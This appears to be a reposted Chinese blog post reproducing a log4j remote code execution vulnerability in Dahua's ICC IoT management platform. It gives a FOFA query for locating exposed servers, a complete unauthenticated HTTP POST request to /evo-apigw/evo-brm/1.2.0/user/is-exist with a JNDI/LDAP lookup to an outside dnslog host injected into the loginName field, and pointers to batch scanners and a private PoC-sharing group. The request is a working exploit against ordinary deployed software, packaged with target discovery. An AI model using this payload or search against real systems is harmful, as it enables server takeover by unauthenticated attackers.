您的位置:首页 > 科技 > IT业 > 【漏洞复现】大华智能物联综合管理平台 log4j远程代码执行漏洞

【漏洞复现】大华智能物联综合管理平台 log4j远程代码执行漏洞

2024/11/19 14:27:01 来源:https://blog.csdn.net/m0_60571842/article/details/139307327  浏览:    关键词:【漏洞复现】大华智能物联综合管理平台 log4j远程代码执行漏洞

0x01 产品简介

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。

0x02 漏洞概述

大华ICC智能物联综合管理平台/evo-apigw/evo-brm/1.2.0/user/is-exist 接口处存在 l0g4i远程代码执行漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行,进一步构造系统内部利用链可导致服务器失陷。

0x03 搜索语法

FOFA:body="*客户端会小于800*"

在这里插入图片描述

0x04 漏洞复现

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8{
"loginName":"${jndi:ldap://xxxx.dnslog.pw}"
}

在这里插入图片描述

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com